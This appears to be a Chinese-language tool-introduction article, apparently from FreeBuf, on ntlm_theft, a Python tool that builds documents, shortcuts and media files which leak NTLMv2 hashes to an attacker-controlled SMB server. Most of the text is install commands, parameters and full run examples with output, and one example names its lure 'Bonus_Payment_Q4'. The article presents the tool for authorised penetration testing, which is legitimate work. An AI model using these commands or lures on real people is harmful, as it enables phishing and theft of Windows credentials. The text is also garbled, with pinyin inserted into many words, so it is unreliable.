如何使用ntlm_theft生成各種類型的NTLMv2哈希竊取文件
作者:Alpha_h4ck
ntlm_theft是一款基于Python 3開發(fā)的開源工具,可以生成21種不同類型的哈希竊取文檔。
關(guān)于ntlm_theft
ntlm_theft是一款基于Python 3開發(fā)的開源工具,可以生成21種不同類型的哈希竊取文檔。該工具適用于網(wǎng)絡(luò)釣魚攻擊,可以用于支持外網(wǎng)SMB流量和內(nèi)部網(wǎng)絡(luò)環(huán)境之中。與基于宏的文檔或利用漏洞的文檔相比,這些文件類型的好處在于,所有的這些文件都是使用“預(yù)期功能”構(gòu)建的。
使用場景
ntlm_theft主要針對滲透測試人員和紅隊(duì)研究人員設(shè)計(jì),可以幫助研究人員對目標(biāo)公司員工進(jìn)行內(nèi)部網(wǎng)絡(luò)釣魚,或大規(guī)模測試防病毒和電子郵件網(wǎng)關(guān)的安全性。如果外網(wǎng)防火墻上允許出站SMB訪問,則它也可用于外部網(wǎng)絡(luò)釣魚。
工具依賴
ntlm_theft基于Python 3開發(fā),因此我們需要在本地環(huán)境安裝并配置好Python 3環(huán)境,并安裝好xlsxwriter:
- pip3 install xlsxwriter
工具下載
廣大研究人員可以使用下列命令將該項(xiàng)目源碼克隆至本地:
- git clone https://github.com/Greenwolf/ntlm_theft.git
工具參數(shù)
ntlm_theft的運(yùn)行需要提供四個(gè)必要參數(shù),一個(gè)輸入格式,輸入文件或目錄,以及基礎(chǔ)的運(yùn)行模式:
- -g, --generate : 選擇生成所有文件或指定文件類型
- -s, --server : SMB哈希捕捉服務(wù)器的IP地址
- -f, --filename : 不包含后綴的基礎(chǔ)文件名,之后可以進(jìn)行重命名
工具運(yùn)行
下面給出的工具演示樣例中,我們將使用ntlm_theft生成所有文件:
- # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
- Created: test/test.scf (BROWSE)
- Created: test/test-(url).url (BROWSE)
- Created: test/test-(icon).url (BROWSE)
- Created: test/test.rtf (OPEN)
- Created: test/test-(stylesheet).xml (OPEN)
- Created: test/test-(fulldocx).xml (OPEN)
- Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
- Created: test/test-(includepicture).docx (OPEN)
- Created: test/test-(remotetempl*ate).docx (OPEN)
- Created: test/test-(frameset).docx (OPEN)
- Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)
- Created: test/test.asx (OPEN)
- Created: test/test.jnlp (OPEN)
- Created: test/test.application (DOWNLOAD AND OPEN)
- Created: test/test.pdf (OPEN AND ALLOW)
- Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
- Generation Complete.
在下面的工具使用樣例中,我們將使用ntlm_theft僅生成現(xiàn)代文件:
- # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
- Skipping SCF as it does not work on modern Windows
- Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
- Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
- Created: meeting/meeting.rtf (OPEN)
- Created: meeting/meeting-(stylesheet).xml (OPEN)
- Created: meeting/meeting-(fulldocx).xml (OPEN)
- Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
- Created: meeting/meeting-(includepicture).docx (OPEN)
- Created: meeting/meeting-(remotetempl*ate).docx (OPEN)
- Created: meeting/meeting-(frameset).docx (OPEN)
- Created: meeting/meeting-(externalcell).xlsx (OPEN)
- Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)
- Created: meeting/meeting.asx (OPEN)
- Created: meeting/meeting.jnlp (OPEN)
- Created: meeting/meeting.application (DOWNLOAD AND OPEN)
- Created: meeting/meeting.pdf (OPEN AND ALLOW)
- Skipping zoom as it does not work on the latest versions
- Skipping Autorun.inf as it does not work on modern Windows
- Skipping desktop.ini as it does not work on modern Windows
- Generation Complete.
在下面的工具使用樣例中,我們將使用ntlm_theft僅生成一份xlsx文件:
- # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
- Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
- Generation Complete.
工具運(yùn)行截圖
項(xiàng)目地址
ntlm_theft:【GitHub傳送門】
責(zé)任編輯:趙寧寧
來源:
FreeBuf
